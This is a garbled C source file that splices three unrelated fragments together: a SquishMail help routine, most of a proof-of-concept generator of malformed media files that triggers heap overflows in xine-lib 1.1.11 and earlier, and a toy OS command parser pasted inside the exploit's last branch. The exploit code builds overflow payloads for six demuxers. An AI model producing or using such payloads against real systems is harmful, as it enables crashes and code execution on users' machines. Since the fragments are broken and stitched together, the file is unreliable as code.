void usage(void)
{
char temp[50];
putss("SquishMail can be started with any of the following commands:\n\n"
" SQUISH [IN] [OUT] [SQUASH] [LINK] [switches...]\n\n"
" Any or all of the above options may be specified on one command-line.\n"
" `IN' instructs Squish to toss (import) messages. `OUT' instructs\n"
" Squish to scan (export) messages. `SQUASH' instructs Squish to\n"
" pack/mash messages in the netmail area. `LINK' instructs Squish to\n"
" relink reply chains. Specifying `IN' and `OUT' together turns on\n"
" Squish's one-pass mode.\n\n"
" SQUISH RESCAN <area_tag> <node> - Rescan area to node\n"
" SQUISH SEND <file> [TO] <node> [flavour] - Attach file to node\n"
" SQUISH GET <file> [FROM] <node> [flavour] - Request file from node\n"
" SQUISH UPDATE <file> [FROM] <node> [flavour] - Upd. request file from node\n"
" SQUISH POLL <node> [flavour] - Poll node\n\n");
(void)printf("Press <enter> to continue: ");
(void)fgets(temp, 50, stdin);
putss("\n");
putss("Command-line arguments supported by Squish are:\n\n"
" -a<areas_bbs> - Use <areas_bbs> instead of the default AREAS.BBS\n"
" -c<config_file> - Use <config_file> instead of SQUISH.CFG\n"
" -f<echotoss> - Use <echotoss> to log areas (toss) or to link/scan\n"
" -l - Leave uncompressed packets in OUTBOUND.SQ\n"
" -n<log_file> - Override the log file given in SQUISH.CFG\n"
" -o - When doing a `squash', process outbound area only\n"
" -q - Quiet mode. Suppresses most informational displays\n"
" -s<tag> - Override default scheduling, and run schedule <tag>\n"
" -t - Toggle secure mode\n"
" -u - Toggle TossBadMsgs mode\n"
" -v - Toggle statistics mode\n"
" -z - Only scan non-passthrough areas\n");
exit(ERL_ERROR);
}
int main(int argc, char *argv[]) {
FILE *fd;
int i,
attack;
u8 *buff,
*fname,
*psize,
*p;
setbuf(stdout, NULL);
fputs("\n"
"xine-lib <= 1.1.11 multiple heap overflows "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = heap overflow in demux_flv (file.FLV)\n"
" 2 = heap overflow in demux_qt (file.MOV)\n"
" 3 = heap overflow in demux_real (file.RM)\n"
" 4 = heap overflow in demux_wc3movie (file.MVE)\n"
" 5 = heap overflow in ebml.c (file.MKV)\n"
" 6 = heap overflow in demux_film.c (file.CAK)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
buff = malloc(BUFFSZ);
if(!buff) std_err();
p = buff;
if(attack == 1) {
p += putss(p, "FLV\x01");
*p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO;
p += putxb(p, 9, 32);
p += putxb(p, 0, 32);
p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8); // tag_type
psize = p; p += 3;
p += putxb(p, 0, 32); // pts
p += putxb(p, 0, 24);
p += putxb(p, FLV_DATA_TYPE_OBJECT, 8);
p += putxb(p, 13, 16);
p += putss(p, "filepositions");
p += putxb(p, FLV_DATA_TYPE_ARRAY, 8);
p += putxb(p, 0x20000000, 32);
for(i = 0; i < 4000; i++) {
p += putxb(p, FLV_DATA_TYPE_NUMBER, 8);
p += putxb(p, 0x4141414141414141ULL, 64);
}
p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8); // useless
putxb(psize, p - (psize + 3 + 4 + 3), 24);
} else if(attack == 2) {
p += putxb(p, 8000 - 24, 32);
p += putxb(p, MOOV_ATOM, 32);
p += putxb(p, 8000 - 16, 32);
p += putxb(p, RMRA_ATOM, 32);
p += putxb(p, 8000 - 8, 32);
p += putxb(p, RDRF_ATOM, 32);
p += putxb(p, 0, 32); // i + 4
p += putxb(p, 0, 32); // i + 8
p += putxb(p, 0xffffffff, 32); // i + 12
p += putcc(p, 'A', 8000 - 12);
} else if(attack == 3) {
p += putxb(p, RMF_TAG, 32);
p += putxb(p, 8, 32);
p += putxb(p, MDPR_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 1, 16); // mdpr->stream_number
p += putxb(p, 0, 32); // mdpr->max_bit_rate
p += putxb(p, 0, 32); // mdpr->avg_bit_rate
p += putxb(p, 0, 32); // mdpr->max_packet_size
p += putxb(p, 0, 32); // mdpr->avg_packet_size
p += putxb(p, 0, 32); // mdpr->start_time
p += putxb(p, 0, 32); // mdpr->preroll
p += putxb(p, 0, 32); // mdpr->duration
p += putxb(p, 0, 8); // mdpr->stream_name_size
// mdpr->stream_name
p += putxb(p, 0, 8); //
mdpr->mime_type_size=data[33+mdpr->stream_name_size];
// mdpr->mime_type
p += putxb(p, 8, 32); // mdpr->type_specific_len
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, PROP_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32);
p += putxb(p, 1, 32); // avg_bitrate
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32); // this->duration
p += putxb(p, 0, 32);
p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32);
// this->index_start
p += putxb(p, 0, 32); // this->data_start
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, DATA_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32); //
this->current_data_chunk_packet_count
p += putxb(p, 0, 32); //
this->next_data_chunk_offset
p += putxb(p, INDX_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 16);
p += putxb(p, 0x15555556, 32); // entries
p += putxb(p, 1, 16); // stream_num
p += putxb(p, 0, 32); // next_index_chunk
for(i = 0; i < 4000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) + 4, 32);
} else if(attack == 4) {
p += putxb(p, FORM_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, MOVE_TAG, 32);
p += putxb(p, PC_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxi(p, 0x555556, 32); // this->number_of_shots
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
for(i = 0; i < 80; i++) {
p += putxb(p, PALT_TAG, 32);
p += putxb(p, PALETTE_CHUNK_SIZE, 32);
p += putcc(p, 13, PALETTE_CHUNK_SIZE); // -> 0x48
}
} else if(attack == 5) {
p += gst_ebml_write_element_id(p, EBML_ID_EBML);
p += gst_ebml_write_element_size(p, 8000); // not perfect
p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE);
p += gst_ebml_write_element_size(p, 0xffffffff);
p += putcc(p, 'A', 8000);
} else if(attack == 6) {
p += putss(p, "FILM");
p += 4;
p += putss(p, "1.09");
p += putxb(p, 0, 32);
p += putxb(p, STAB_TAG, 32);
psize = p; p += 4;
p += putxb(p, 44100, 32);
p += putxb(p, 0x71c71c8, 32); // sizeof(film_sample_t) is
36 bytes
for(i = 0; i < 3000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) - 40, 32);
putxb(buff + 4, (p - psize) - 8 - 16, 32);
} else {
void run_command() {
is_cmd = 1;
int size = str_len(command);
if(str_startswith(command, "hlt") == 1) {
text_color(BLACK, BLACK);
clear_screen();
halt();
} else if(str_startswith(command, "println")) {
putslns(command, 8, size);
} else if(str_startswith(command, "printvln")) {
if(letti(command[9]) != -1)
putnumln(reg[letti(command[9])]);
} else if(str_startswith(command, "printv")) {
if(letti(command[7]) != -1)
putnum(reg[letti(command[7])]);
} else if(str_startswith(command, "print")) {
putss(command, 6, size);
} else if (str_startswith(command, "clear")) {
clear_screen();
index = 0;
} else if(str_startswith(command, "setv")) {
if(letti(command[5]) != -1) {
int r = letti(command[5]);
int i = 0;
while(i < 7) {
command[i] = ' ';
i++;
}
reg[r] = atoi(command);
}
} else if(str_startswith(command, "add")) {
if(letti(command[4])!=-1 && letti(command[6])!=-1)
reg[letti(command[4])] += reg[letti(command[6])];
} else if(str_startswith(command, "sub")) {
if(letti(command[4])!=-1 && letti(command[6])!=-1)
reg[letti(command[4])] -= reg[letti(command[6])];
} else if(str_startswith(command, "mul")) {
if(letti(command[4])!=-1 && letti(command[6])!=-1)
reg[letti(command[4])] *= reg[letti(command[6])];
} else if(str_startswith(command, "div")) {
if(letti(command[4])!=-1 && letti(command[6])!=-1)
reg[letti(command[4])] /= reg[letti(command[6])];
} else if(str_startswith(command, "mod")) {
if(letti(command[4])!=-1 && letti(command[6])!=-1)
reg[letti(command[4])] %= reg[letti(command[6])];
} else if(str_startswith(command, "cc") == 1) {
if(str_startswith(command, "cc help")) {
putsln("Colors:");
putsln(">>> BLACK :: 0");
putsln(">>> BLUE :: 1");
putsln(">>> GREEN :: 2");
putsln(">>> CYAN :: 3");
putsln(">>> RED :: 4");
putsln(">>> MAGENTA :: 5");
putsln(">>> BROWN :: 6");
putsln(">>> LT GRAY :: 7");
putsln(">>> DK GRAY :: 8");
putsln(">>> LT BLUE :: 9");
putsln(">>> LT GREEN :: A");
putsln(">>> LT CYAN :: B");
putsln(">>> LT RED :: C");
putsln(">>> LT MAGENTA :: D");
putsln(">>> LT BROWN :: E");
putsln(">>> WHITE :: F");
} else {
char b = command[4];
char f = command[3];
if(f > '@' && b > '@')
text_color(f - '0', b - 55);
else if(f > '@')
text_color(f - 55, b - '0');
else if(b > '@')
text_color(f - '0', b - 55);
else
text_color(f - '0', b - '0');
}
} else if(str_startswith(command, "help") == 1) {
putsln("Commands:");
putsln(">>> hlt :: halts cpu");
putsln(">>> cc fb|help :: change text color - (fore, back)");
putsln(">>> print text :: print out a piece of text");
putsln(">>> printv let :: print out the value of variable let");
putsln(">>> printvln let :: print out the value of variable let with a line after");
putsln(">>> println text :: print out a piece of text with a line");
putsln(">>> clear :: Clears the screen");
putsln(">>> setv let val :: set variable let to val");
putsln(">>> add base set :: adds base to set and stores in base");
putsln(">>> sub base set :: subtracts base from set and stores in base");
putsln(">>> mul base set :: multiplies base by set and stores in base");
putsln(">>> div base set :: divides base by set and stores in set");
putsln(">>> mod base set :: divides base by set and stores remainder in set");
putsln(">>> println text :: print out a piece of text with a line");
putsln(">>> help :: show help command");
} else {
puts(">>> Unknown command: ");
putsln(command);
putsln(">>> Try help.");
}
clear_command();
is_cmd = 0;
}